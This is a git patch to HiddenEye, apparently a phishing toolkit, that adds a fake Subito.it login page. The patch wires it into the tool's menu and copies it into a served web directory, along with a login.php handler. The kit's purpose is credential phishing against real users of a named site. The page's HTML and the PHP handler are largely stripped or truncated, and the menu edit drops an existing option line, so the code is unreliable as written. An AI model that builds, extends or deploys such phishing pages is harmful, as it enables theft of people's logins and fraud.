From 21744c17e0ab49e2c6f9c91c33da91069a6fcfd6 Mon Sep 17 00:00:00 2001 From: root Date: Fri, 25 Oct 2019 17:47:46 +0200 Subject: [PATCH] Add Subito.it Web Page --- Defs/Actions.py | 9 +- HiddenEye.py | 0 WebPages/subitoit/index.html | 328 +++++++++++++++++++++++++++++++++++ WebPages/subitoit/login.php | 6 + 4 files changed, 341 insertions(+), 2 deletions(-) mode change 100644 => 100755 HiddenEye.py create mode 100644 WebPages/subitoit/index.html create mode 100644 WebPages/subitoit/login.php diff --git a/Defs/Actions.py b/Defs/Actions.py index c5db9d6..301b7ee 100644 --- a/Defs/Actions.py +++ b/Defs/Actions.py @@ -122,6 +122,8 @@ def runPhishing(page , customOption): #Phishing pages selection menu copy_tree("WebPages/Reddit/", "Server/www/") elif customOption == '2' and page == 'Reddit': copy_tree("WebPages/Reddit-old/", "Server/www/") + elif page == 'Subitoit': + copy_tree("WebPages/subitoit/", "Server/www/") else: endMessage() @@ -302,9 +304,8 @@ def mainMenu(): print (_(" {0}[{1}5{0}]{1} StackOverflow {0}[{1}14{0}]{1} VK {0}[{1}23{0}]{1} PornHub {0}[{1}32{0}]{1} Shopify").format(MAIN0, MAIN2)) print (_(" {0}[{1}6{0}]{1} WordPress {0}[{1}15{0}]{1} iCloud {0}[{1}24{0}]{1} Adobe {0}[{1}33{0}]{1} Verizon").format(MAIN0, MAIN2)) print (_(" {0}[{1}7{0}]{1} Twitter {0}[{1}16{0}]{1} GitLab {0}[{1}25{0}]{1} Badoo {0}[{1}34{0}]{1} Yandex").format(MAIN0, MAIN2)) - print (_(" {0}[{1}8{0}]{1} Instagram {0}[{1}17{0}]{1} Netflix {0}[{1}26{0}]{1} CryptoCurrency {0}[{1}35{0}]{1} Reddit").format(MAIN0, MAIN2)) - print (_(" {0}[{1}9{0}]{1} Snapchat {0}[{1}18{0}]{1} Origin {0}[{1}27{0}]{1} DevianArt ").format(MAIN0, MAIN2)) + print (_(" {0}[{1}9{0}]{1} Snapchat {0}[{1}18{0}]{1} Origin {0}[{1}27{0}]{1} DevianArt {0}[{1}36{0}]{1} SUbito.it").format(MAIN0, MAIN2)) option = input(_("{0}HiddenEye >>> {1}").format(MAIN0, MAIN2)) if option == '1': loadModule('Facebook') @@ -446,6 +447,10 @@ def mainMenu(): loadModule('Reddit') customOption = input(_("\nOperation mode:\n {0}[{1}1{0}]{1} New reddit page\n {0}[{1}2{0}]{1} Old reddit page\n{0}HiddenEye >>> {2}").format(MAIN0, MAIN2, MAIN2)) runPhishing('Reddit', customOption) + elif option == '36': + loadModule('Subitoit') + customOption = '' + runPhishing('Subitoit', customOption) else: endMessage() diff --git a/HiddenEye.py b/HiddenEye.py old mode 100644 new mode 100755 diff --git a/WebPages/subitoit/index.html b/WebPages/subitoit/index.html new file mode 100644 index 0000000..84e1cb3 --- /dev/null +++ b/WebPages/subitoit/index.html @@ -0,0 +1,328 @@ + + + + + + + Accesso area riservata - Subito.it + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+
+
+
+ +
+ +
+ +
+
+ +
+
+ + + +
+ + + + + + + + + + + + + +
+ +
+ + + + + + + + \ No newline at end of file diff --git a/WebPages/subitoit/login.php b/WebPages/subitoit/login.php new file mode 100644 index 0000000..d8b51d4 --- /dev/null +++ b/WebPages/subitoit/login.php @@ -0,0 +1,6 @@ +'); +exit();